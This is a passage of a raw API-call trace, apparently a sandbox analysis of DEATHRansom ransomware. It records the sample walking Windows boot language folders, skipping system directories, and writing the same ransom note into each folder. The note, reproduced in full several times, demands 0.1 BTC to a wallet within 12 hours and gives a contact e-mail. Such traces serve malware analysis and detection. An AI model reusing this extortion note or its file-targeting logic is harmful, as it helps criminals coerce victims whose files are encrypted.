dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.647] wnsprintfW (in: pszDest=0x8ae00d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0073.647] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.647] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.647] wnsprintfW (in: pszDest=0x8ae00d0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\read_me.txt") returned 29 [0073.648] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\read_me.txt" (normalized: "c:\\boot\\ko-kr\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.648] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.648] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.649] CloseHandle (hObject=0x7a8) returned 1 [0073.649] GetProcessHeap () returned 0x280000 [0073.649] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ae00d0 | out: hHeap=0x280000) returned 1 [0073.649] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x240000, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0073.649] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\memtest.exe") returned 23 [0073.649] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0073.649] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO") returned 17 [0073.649] lstrcmpW (lpString1="nb-NO", lpString2="..") returned 1 [0073.649] lstrcmpW (lpString1="nb-NO", lpString2=".") returned 1 [0073.649] StrStrW (lpFirst="nb-no", lpSrch="programdata") returned 0x0 [0073.649] StrStrW (lpFirst="nb-no", lpSrch="$recycle.bin") returned 0x0 [0073.649] StrStrW (lpFirst="nb-no", lpSrch="program files") returned 0x0 [0073.649] StrStrW (lpFirst="nb-no", lpSrch="windows") returned 0x0 [0073.649] StrStrW (lpFirst="nb-no", lpSrch="all users") returned 0x0 [0073.649] StrStrW (lpFirst="nb-no", lpSrch="appdata") returned 0x0 [0073.649] GetProcessHeap () returned 0x280000 [0073.649] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ae00d0 [0073.650] lstrcpyW (in: lpString1=0x8ae00d0, lpString2="\\\\?\\C:\\Boot\\nb-NO" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO") returned="\\\\?\\C:\\Boot\\nb-NO" [0073.650] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 15 [0073.650] QueueUserWorkItem (Function=0x40a710, Context=0x8ae00d0, Flags=0x0) returned 1 [0073.650] GetProcessHeap () returned 0x280000 [0073.650] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8af00d8 [0073.650] wnsprintfW (in: pszDest=0x8af00d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\*") returned 19 [0073.650] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.651] wnsprintfW (in: pszDest=0x8af00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\.") returned 19 [0073.651] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.651] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.651] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.651] wnsprintfW (in: pszDest=0x8af00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\..") returned 20 [0073.651] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.651] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.651] wnsprintfW (in: pszDest=0x8af00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 33 [0073.651] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.651] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.651] wnsprintfW (in: pszDest=0x8af00d8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\read_me.txt") returned 29 [0073.651] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\read_me.txt" (normalized: "c:\\boot\\nb-no\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.651] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.651] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.652] CloseHandle (hObject=0x7a8) returned 1 [0073.652] GetProcessHeap () returned 0x280000 [0073.653] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8af00d8 | out: hHeap=0x280000) returned 1 [0073.653] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0073.653] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL") returned 17 [0073.653] lstrcmpW (lpString1="nl-NL", lpString2="..") returned 1 [0073.653] lstrcmpW (lpString1="nl-NL", lpString2=".") returned 1 [0073.653] StrStrW (lpFirst="nl-nl", lpSrch="programdata") returned 0x0 [0073.653] StrStrW (lpFirst="nl-nl", lpSrch="$recycle.bin") returned 0x0 [0073.653] StrStrW (lpFirst="nl-nl", lpSrch="program files") returned 0x0 [0073.653] StrStrW (lpFirst="nl-nl", lpSrch="windows") returned 0x0 [0073.653] StrStrW (lpFirst="nl-nl", lpSrch="all users") returned 0x0 [0073.653] StrStrW (lpFirst="nl-nl", lpSrch="appdata") returned 0x0 [0073.653] GetProcessHeap () returned 0x280000 [0073.653] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8af00d8 [0073.653] lstrcpyW (in: lpString1=0x8af00d8, lpString2="\\\\?\\C:\\Boot\\nl-NL" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL") returned="\\\\?\\C:\\Boot\\nl-NL" [0073.653] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 16 [0073.653] QueueUserWorkItem (Function=0x40a710, Context=0x8af00d8, Flags=0x0) returned 1 [0073.653] GetProcessHeap () returned 0x280000 [0073.653] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b000e0 [0073.654] wnsprintfW (in: pszDest=0x8b000e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\*") returned 19 [0073.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.655] wnsprintfW (in: pszDest=0x8b000e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\.") returned 19 [0073.655] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.655] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.655] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.655] wnsprintfW (in: pszDest=0x8b000e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\..") returned 20 [0073.655] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.655] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.655] wnsprintfW (in: pszDest=0x8b000e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 33 [0073.655] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.655] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.655] wnsprintfW (in: pszDest=0x8b000e0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\read_me.txt") returned 29 [0073.655] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\read_me.txt" (normalized: "c:\\boot\\nl-nl\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.656] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.656] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.657] CloseHandle (hObject=0x7a8) returned 1 [0073.657] GetProcessHeap () returned 0x280000 [0073.657] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b000e0 | out: hHeap=0x280000) returned 1 [0073.657] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0073.657] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL") returned 17 [0073.657] lstrcmpW (lpString1="pl-PL", lpString2="..") returned 1 [0073.657] lstrcmpW (lpString1="pl-PL", lpString2=".") returned 1 [0073.657] StrStrW (lpFirst="pl-pl", lpSrch="programdata") returned 0x0 [0073.657] StrStrW (lpFirst="pl-pl", lpSrch="$recycle.bin") returned 0x0 [0073.657] StrStrW (lpFirst="pl-pl", lpSrch="program files") returned 0x0 [0073.657] StrStrW (lpFirst="pl-pl", lpSrch="windows") returned 0x0 [0073.657] StrStrW (lpFirst="pl-pl", lpSrch="all users") returned 0x0 [0073.657] StrStrW (lpFirst="pl-pl", lpSrch="appdata") returned 0x0 [0073.657] GetProcessHeap () returned 0x280000 [0073.657] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b000e0 [0073.657] lstrcpyW (in: lpString1=0x8b000e0, lpString2="\\\\?\\C:\\Boot\\pl-PL" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL") returned="\\\\?\\C:\\Boot\\pl-PL" [0073.657] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 17 [0073.657] QueueUserWorkItem (Function=0x40a710, Context=0x8b000e0, Flags=0x0) returned 1 [0073.657] GetProcessHeap () returned 0x280000 [0073.657] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b100e8 [0073.658] wnsprintfW (in: pszDest=0x8b100e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\*") returned 19 [0073.658] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.659] wnsprintfW (in: pszDest=0x8b100e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\.") returned 19 [0073.659] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.659] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.659] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.659] wnsprintfW (in: pszDest=0x8b100e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\..") returned 20 [0073.659] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.659] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.659] wnsprintfW (in: pszDest=0x8b100e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 33 [0073.659] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.659] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 